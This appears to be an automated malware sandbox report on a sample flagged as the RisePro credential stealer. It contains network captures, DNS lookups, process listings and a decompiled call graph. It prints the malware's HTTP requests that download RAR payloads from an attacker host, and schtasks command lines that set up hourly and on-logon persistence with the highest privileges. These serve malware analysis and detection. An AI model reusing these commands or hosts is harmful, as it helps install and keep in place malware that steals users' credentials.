                                  Jul 25, 2024 02:16:36.867475986 CEST49710799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:36.870415926 CEST49710799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:36.875307083 CEST7994971044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:37.270068884 CEST7994971044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:37.270092964 CEST7994971044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:37.270173073 CEST49710799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:37.270174026 CEST49710799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:37.271182060 CEST49710799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:37.276046991 CEST7994971044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:37.631540060 CEST4970950500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:37.636564970 CEST5050049709193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:40.241132975 CEST4971350500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:40.246176958 CEST5050049713193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:40.246440887 CEST4971350500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:40.249126911 CEST4971450500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:40.255311012 CEST5050049714193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:40.255418062 CEST4971450500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:40.273972988 CEST4971350500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:40.278959990 CEST5050049713193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:40.284810066 CEST4971450500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:40.290746927 CEST5050049714193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:43.236157894 CEST4971350500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:43.241175890 CEST5050049713193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:43.267412901 CEST4971450500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:43.272938967 CEST5050049714193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:50.345130920 CEST49720799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:50.352262020 CEST7994972044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:50.352397919 CEST49720799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:50.352586985 CEST49720799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:50.357521057 CEST7994972044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:50.770221949 CEST7994972044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:50.770288944 CEST7994972044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:50.770303011 CEST49720799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:50.770335913 CEST49720799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:50.772769928 CEST49720799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:50.777535915 CEST7994972044.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:53.278872013 CEST49721799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:53.283896923 CEST7994972144.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:53.287858009 CEST49721799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:53.288192987 CEST49721799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:53.293371916 CEST7994972144.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:53.692313910 CEST7994972144.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:53.692425966 CEST7994972144.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:53.692444086 CEST49721799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:53.692512989 CEST49721799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:53.693517923 CEST49721799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:53.698815107 CEST7994972144.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:54.841211081 CEST4972250500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:54.846167088 CEST5050049722193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:54.846262932 CEST4972250500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:54.878237009 CEST4972250500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:54.883217096 CEST5050049722193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:56.011591911 CEST5050049709193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:56.011770010 CEST4970950500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:56.185805082 CEST49723799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:56.190808058 CEST7994972344.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:56.190901995 CEST49723799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:56.191471100 CEST49723799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:56.196373940 CEST7994972344.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:56.571852922 CEST7994972344.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:56.571909904 CEST7994972344.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:56.571937084 CEST49723799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:56.571979046 CEST49723799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:56.590423107 CEST49723799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:56.595597029 CEST7994972344.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:57.861221075 CEST4972250500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:57.866127968 CEST5050049722193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:00.434250116 CEST49724799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:00.439364910 CEST7994972444.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:00.439477921 CEST49724799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:00.439752102 CEST49724799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:00.444557905 CEST7994972444.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:00.839658976 CEST7994972444.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:00.839682102 CEST7994972444.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:00.839786053 CEST49724799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:00.840970039 CEST49724799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:00.845799923 CEST7994972444.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:00.919651985 CEST4972550500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:00.924678087 CEST5050049725193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:00.924776077 CEST4972550500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:00.963252068 CEST4972550500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:00.968432903 CEST5050049725193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:01.612186909 CEST5050049713193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:01.612296104 CEST4971350500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:01.633557081 CEST5050049714193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:01.633637905 CEST4971450500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:03.168735027 CEST49726799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:03.173930883 CEST7994972644.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:03.174101114 CEST49726799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:03.176158905 CEST49726799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:03.181046009 CEST7994972644.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:03.563735008 CEST7994972644.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:03.563796997 CEST7994972644.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:03.563868999 CEST49726799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:03.563919067 CEST49726799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:03.566409111 CEST49726799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:17:03.571280003 CEST7994972644.221.84.105192.168.2.10
                                  Jul 25, 2024 02:17:03.940751076 CEST4972550500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:03.946271896 CEST5050049725193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:16.226605892 CEST5050049722193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:16.226700068 CEST4972250500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:17:22.286350012 CEST5050049725193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:17:22.286473036 CEST4972550500192.168.2.10193.233.132.62
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 25, 2024 02:16:30.189325094 CEST5968453192.168.2.101.1.1.1
                                  Jul 25, 2024 02:16:30.284832954 CEST53596841.1.1.1192.168.2.10
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 25, 2024 02:16:30.189325094 CEST192.168.2.101.1.1.10x43bbStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 25, 2024 02:16:30.284832954 CEST1.1.1.1192.168.2.100x43bbNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                  • ddos.dnsnb8.net:799
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.104970744.221.84.1057997456C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:16:30.329478979 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.104970844.221.84.1057997456C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:16:33.606467962 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.104971044.221.84.1057997456C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:16:36.870415926 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.104972044.221.84.1057991836C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:16:50.352586985 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.104972144.221.84.1057991836C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:16:53.288192987 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.104972344.221.84.1057991836C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:16:56.191471100 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.104972444.221.84.1057991836C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:17:00.439752102 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.104972644.221.84.1057991836C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 02:17:03.176158905 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:2
                                  Start time:20:16:27
                                  Start date:24/07/2024
                                  Path:C:\Users\user\Desktop\hunta[1].exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\hunta[1].exe"
                                  Imagebase:0xe80000
                                  File size:2'383'872 bytes
                                  MD5 hash:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:4
                                  Start time:20:16:27
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  Imagebase:0x210000
                                  File size:15'872 bytes
                                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 92%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:10
                                  Start time:20:16:33
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                  Imagebase:0xb10000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:20:16:33
                                  Start date:24/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff620390000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:20:16:33
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                  Imagebase:0xb10000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:20:16:33
                                  Start date:24/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff620390000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:20:16:33
                                  Start date:24/07/2024
                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Imagebase:0x300000
                                  File size:2'383'872 bytes
                                  MD5 hash:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 95%, ReversingLabs
                                  Reputation:low
                                  Has exited:false

                                  Target ID:15
                                  Start time:20:16:33
                                  Start date:24/07/2024
                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Imagebase:0x300000
                                  File size:2'383'872 bytes
                                  MD5 hash:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:18
                                  Start time:20:16:36
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
                                  Imagebase:0x6a0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:21
                                  Start time:20:16:47
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                  Imagebase:0x270000
                                  File size:2'383'872 bytes
                                  MD5 hash:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 95%, ReversingLabs
                                  Reputation:low
                                  Has exited:false

                                  Target ID:22
                                  Start time:20:16:47
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  Imagebase:0xb50000
                                  File size:15'872 bytes
                                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:24
                                  Start time:20:16:55
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                  Imagebase:0x270000
                                  File size:2'383'872 bytes
                                  MD5 hash:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:25
                                  Start time:20:17:05
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
                                  Imagebase:0xd70000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:26
                                  Start time:20:17:05
                                  Start date:24/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff620390000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.2%
                                    Dynamic/Decrypted Code Coverage:1.9%
                                    Signature Coverage:8.8%
                                    Total number of Nodes:261
                                    Total number of Limit Nodes:26
                                    execution_graph 23542 f667f6 23543 f66809 ___std_exception_copy 23542->23543 23548 f6654d 23543->23548 23545 f6681e 23555 f61b9c RtlAllocateHeap ___std_exception_copy 23545->23555 23547 f6682b 23551 f66559 std::_Locinfo::_Locinfo_dtor 23548->23551 23549 f6655f 23565 f61de3 RtlAllocateHeap ___std_exception_copy __Getctype 23549->23565 23551->23549 23552 f665a2 23551->23552 23556 f666d0 23552->23556 23554 f6657a 23554->23545 23555->23547 23557 f666f6 23556->23557 23558 f666e3 23556->23558 23566 f665f7 23557->23566 23558->23554 23560 f66719 23564 f667a7 23560->23564 23570 f62c91 23560->23570 23564->23554 23565->23554 23567 f66608 23566->23567 23568 f66660 23566->23568 23567->23568 23579 f6b7fd SetFilePointerEx RtlAllocateHeap ___std_exception_copy 23567->23579 23568->23560 23571 f62cd1 23570->23571 23572 f62caa 23570->23572 23576 f6b83d 23571->23576 23572->23571 23580 f73642 23572->23580 23574 f62cc6 23587 f72a4b 23574->23587 23631 f6b71c 23576->23631 23578 f6b856 23578->23564 23579->23568 23581 f73663 23580->23581 23582 f7364e 23580->23582 23581->23574 23594 f6a8ff RtlAllocateHeap __dosmaperr 23582->23594 23584 f73653 23595 f61e60 RtlAllocateHeap ___std_exception_copy 23584->23595 23586 f7365e 23586->23574 23588 f72a57 std::_Locinfo::_Locinfo_dtor 23587->23588 23589 f72a98 23588->23589 23591 f72ade 23588->23591 23593 f72a5f 23588->23593 23610 f61de3 RtlAllocateHeap ___std_exception_copy __Getctype 23589->23610 23591->23593 23596 f72b5c 23591->23596 23593->23571 23594->23584 23595->23586 23597 f72b84 23596->23597 23609 f72ba7 23596->23609 23598 f72b88 23597->23598 23600 f72be3 23597->23600 23616 f61de3 RtlAllocateHeap ___std_exception_copy __Getctype 23598->23616 23601 f72c01 23600->23601 23603 f6b83d 2 API calls 23600->23603 23611 f726a1 23601->23611 23603->23601 23605 f72c60 23607 f72cc9 WriteFile 23605->23607 23605->23609 23606 f72c19 23606->23609 23617 f72272 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor _ValidateLocalCookies std::locale::_Locimp::_Locimp 23606->23617 23607->23609 23609->23593 23610->23593 23618 f7e404 23611->23618 23613 f726e1 23613->23605 23613->23606 23614 f726b3 23614->23613 23627 f673d0 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor ___std_exception_copy 23614->23627 23616->23609 23617->23609 23619 f7e411 23618->23619 23620 f7e41e 23618->23620 23628 f6a8ff RtlAllocateHeap __dosmaperr 23619->23628 23622 f7e42a 23620->23622 23629 f6a8ff RtlAllocateHeap __dosmaperr 23620->23629 23622->23614 23624 f7e416 23624->23614 23625 f7e44b 23630 f61e60 RtlAllocateHeap ___std_exception_copy 23625->23630 23627->23613 23628->23624 23629->23625 23630->23624 23636 f77d9e 23631->23636 23633 f6b72e 23634 f6b74a SetFilePointerEx 23633->23634 23635 f6b736 23633->23635 23634->23635 23635->23578 23637 f77dc0 23636->23637 23638 f77dab 23636->23638 23643 f77de5 23637->23643 23651 f6a8ec RtlAllocateHeap __dosmaperr 23637->23651 23649 f6a8ec RtlAllocateHeap __dosmaperr 23638->23649 23640 f77db0 23650 f6a8ff RtlAllocateHeap __dosmaperr 23640->23650 23643->23633 23644 f77df0 23652 f6a8ff RtlAllocateHeap __dosmaperr 23644->23652 23645 f77db8 23645->23633 23647 f77df8 23653 f61e60 RtlAllocateHeap ___std_exception_copy 23647->23653 23649->23640 23650->23645 23651->23644 23652->23647 23653->23645 23928 e82540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 23890 59b07b1 23891 59b0776 GetCurrentHwProfileW 23890->23891 23893 59b080a 23891->23893 23654 1431000 23656 1431044 GetPEB 23654->23656 23657 1431077 CreateFileA 23656->23657 23659 1431265 23657->23659 23660 143122d 23657->23660 23661 1431246 WriteFile 23660->23661 23662 1431244 23660->23662 23663 1431255 FindCloseChangeNotification WinExec 23661->23663 23662->23663 23663->23659 23664 e9ec20 23665 e9f0bf 23664->23665 23672 e9ec5e 23664->23672 23666 e9eca7 setsockopt recv 23666->23672 23668 e9f0aa Sleep 23668->23665 23668->23672 23669 e9ecff 23706 ee8330 23669->23706 23672->23665 23672->23666 23672->23668 23672->23669 23674 e9f09c Sleep 23672->23674 23682 e9db60 WSAStartup 23672->23682 23688 e94a90 23672->23688 23691 e9e060 23672->23691 23673 e9ed38 recv 23675 e9ed59 recv 23673->23675 23681 e9ed7a 23673->23681 23674->23668 23675->23681 23677 ee8330 2 API calls 23677->23681 23680 e9edf1 recv 23680->23681 23681->23674 23681->23677 23681->23680 